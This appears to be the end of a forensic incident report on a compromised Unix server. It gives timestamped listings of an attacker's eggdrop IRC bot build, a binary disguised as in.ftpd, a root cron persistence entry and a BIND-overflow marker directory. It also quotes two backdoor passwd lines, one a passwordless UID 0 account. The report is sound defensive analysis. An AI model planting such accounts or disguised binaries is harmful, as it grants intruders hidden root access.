Fri Apr 7 04:08:38 2000 Tue Feb 22 13:17:02 2000 /dev/e/eggdrop1.4.2/src/mod/share.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:17:19 2000 /dev/e/eggdrop1.4.2/src/mod/transfer.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:17:26 2000 /dev/e/eggdrop1.4.2/src/mod/wire.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:17:27 2000 /dev/e/eggdrop1.4.2/src/mod/woobie.mod
Tue Feb 22 13:13:26 2000 Tue Feb 22 13:09:56 2000 /dev/e/eggdrop1.4.2/src/mod/Makefile
Tue Feb 22 13:13:30 2000 Tue Feb 22 13:13:30 2000 /dev/e/eggdrop1.4.2/src/mod/assoc.o
Tue Feb 22 13:13:36 2000 Tue Feb 22 13:13:35 2000 /dev/e/eggdrop1.4.2/src/mod/blowfish.o
Tue Feb 22 13:14:30 2000 Tue Feb 22 13:14:30 2000 /dev/e/eggdrop1.4.2/src/mod/channels.o
Tue Feb 22 13:14:34 2000 Tue Feb 22 13:14:34 2000 /dev/e/eggdrop1.4.2/src/mod/console.o
Tue Feb 22 13:14:38 2000 Tue Feb 22 13:14:38 2000 /dev/e/eggdrop1.4.2/src/mod/ctcp.o
Tue Feb 22 13:15:12 2000 Tue Feb 22 13:15:12 2000 /dev/e/eggdrop1.4.2/src/mod/filesys.o
Tue Feb 22 13:16:06 2000 Tue Feb 22 13:16:06 2000 /dev/e/eggdrop1.4.2/src/mod/irc.o
Tue Feb 22 13:16:18 2000 Tue Feb 22 13:16:17 2000 /dev/e/eggdrop1.4.2/src/mod/notes.o
Tue Feb 22 13:16:23 2000 Tue Feb 22 13:16:23 2000 /dev/e/eggdrop1.4.2/src/mod/seen.o
Tue Feb 22 13:16:44 2000 Tue Feb 22 13:16:44 2000 /dev/e/eggdrop1.4.2/src/mod/server.o
Tue Feb 22 13:17:02 2000 Tue Feb 22 13:17:02 2000 /dev/e/eggdrop1.4.2/src/mod/share.o
Tue Feb 22 13:17:19 2000 Tue Feb 22 13:17:19 2000 /dev/e/eggdrop1.4.2/src/mod/transfer.o
Tue Feb 22 13:17:26 2000 Tue Feb 22 13:17:26 2000 /dev/e/eggdrop1.4.2/src/mod/wire.o
Tue Feb 22 13:17:28 2000 Tue Feb 22 13:17:27 2000 /dev/e/eggdrop1.4.2/src/mod/woobie.o
Tue Feb 22 13:10:32 2000 Tue Feb 22 13:09:55 2000 /dev/e/eggdrop1.4.2/src/Makefile
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:10:42 2000 /dev/e/eggdrop1.4.2/src/botcmd.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:10:49 2000 /dev/e/eggdrop1.4.2/src/botmsg.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:03 2000 /dev/e/eggdrop1.4.2/src/botnet.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:08 2000 /dev/e/eggdrop1.4.2/src/chanprog.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:30 2000 /dev/e/eggdrop1.4.2/src/cmds.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:45 2000 /dev/e/eggdrop1.4.2/src/dcc.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:50 2000 /dev/e/eggdrop1.4.2/src/dccutil.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:55 2000 /dev/e/eggdrop1.4.2/src/flags.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:11:59 2000 /dev/e/eggdrop1.4.2/src/language.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:05 2000 /dev/e/eggdrop1.4.2/src/main.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:06 2000 /dev/e/eggdrop1.4.2/src/mem.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:15 2000 /dev/e/eggdrop1.4.2/src/misc.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:18 2000 /dev/e/eggdrop1.4.2/src/modules.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:26 2000 /dev/e/eggdrop1.4.2/src/net.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:28 2000 /dev/e/eggdrop1.4.2/src/rfc1459.o
Tue Feb 22 13:13:25 2000 Tue Feb 22 13:12:32 2000 /dev/e/eggdrop1.4.2/src/tcl.o
Tue Feb 22 13:13:26 2000 Tue Feb 22 13:12:42 2000 /dev/e/eggdrop1.4.2/src/tcldcc.o
Tue Feb 22 13:13:26 2000 Tue Feb 22 13:12:50 2000 /dev/e/eggdrop1.4.2/src/tclhash.o
Tue Feb 22 13:13:26 2000 Tue Feb 22 13:12:54 2000 /dev/e/eggdrop1.4.2/src/tclmisc.o
Tue Feb 22 13:13:26 2000 Tue Feb 22 13:12:58 2000 /dev/e/eggdrop1.4.2/src/tcluser.o
Tue Feb 22 13:13:26 2000 Tue Feb 22 13:13:05 2000 /dev/e/eggdrop1.4.2/src/userent.o
Tue Feb 22 13:13:26 2000 Tue Feb 22 13:13:10 2000 /dev/e/eggdrop1.4.2/src/userrec.o
Tue Feb 22 13:13:26 2000 Tue Feb 22 13:13:21 2000 /dev/e/eggdrop1.4.2/src/users.o
Tue Feb 22 13:10:31 2000 Tue Feb 22 13:09:54 2000 /dev/e/eggdrop1.4.2/Makefile
Tue Feb 22 13:09:29 2000 Tue Feb 22 13:09:52 2000 /dev/e/eggdrop1.4.2/config.log
Tue Feb 22 13:17:26 2000 Tue Feb 22 13:09:58 2000 /dev/e/eggdrop1.4.2/config.h
Tue Feb 22 13:09:29 2000 Tue Feb 22 13:09:52 2000 /dev/e/eggdrop1.4.2/config.cache
Tue Feb 22 13:09:58 2000 Tue Feb 22 13:09:53 2000 /dev/e/eggdrop1.4.2/config.status
Tue Feb 22 13:10:31 2000 Tue Feb 22 13:10:31 2000 /dev/e/eggdrop1.4.2/EGGMOD.stamp
Tue Feb 22 13:17:26 2000 Tue Feb 22 13:09:56 2000 /dev/e/eggdrop1.4.2/lush.h
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:13:30 2000 /dev/e/eggdrop1.4.2/assoc.so
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:13:36 2000 /dev/e/eggdrop1.4.2/blowfish.so
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:14:30 2000 /dev/e/eggdrop1.4.2/channels.so
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:14:34 2000 /dev/e/eggdrop1.4.2/console.so
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:14:38 2000 /dev/e/eggdrop1.4.2/ctcp.so
Tue Feb 22 13:15:12 2000 Tue Feb 22 13:15:12 2000 /dev/e/eggdrop1.4.2/filesys.so
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:16:06 2000 /dev/e/eggdrop1.4.2/irc.so
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:16:18 2000 /dev/e/eggdrop1.4.2/notes.so
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:16:23 2000 /dev/e/eggdrop1.4.2/seen.so
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:16:44 2000 /dev/e/eggdrop1.4.2/server.so
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:17:02 2000 /dev/e/eggdrop1.4.2/share.so
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:17:19 2000 /dev/e/eggdrop1.4.2/transfer.so
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:17:26 2000 /dev/e/eggdrop1.4.2/wire.so
Tue Feb 22 13:17:28 2000 Tue Feb 22 13:17:28 2000 /dev/e/eggdrop1.4.2/woobie.so
Tue Feb 22 13:46:31 2000 Tue Feb 22 13:45:55 2000 /dev/e/eggdrop1.4.2/cron
Mon Apr 10 11:50:00 2000 Tue Feb 22 13:13:26 2000 /dev/e/eggdrop1.4.2/in.ftpd
Mon Apr 10 11:46:32 2000 Tue Feb 22 13:46:31 2000 /var/spool/cron
Mon Apr 10 11:52:02 2000 Tue Feb 22 13:46:31 2000 /var/spool/cron/root
Fri Apr 7 04:08:39 2000 Tue Feb 22 07:40:02 2000 /var/named
Fri Apr 7 04:08:39 2000 Tue Feb 22 07:40:02 2000 /var/named/ADMROCKS (emtpy directory that created by the buffer over program)
Tue Apr 4 12:28:58 2000 Tue Feb 22 13:06:28 2000 /root/.ncftp/firewall
Tue Apr 4 12:28:58 2000 Tue Feb 22 13:09:00 2000 /root/.ncftp/prefs
The hacker backdoor accounts
server::0:0::/:/bin/bash
cove:x:900:100::/tmp:/bin/bash
References:
Orignal Files and logging at 137.189.victim2
.bash_history
http://www.cert.org/advisories/CA-99-14-bind.html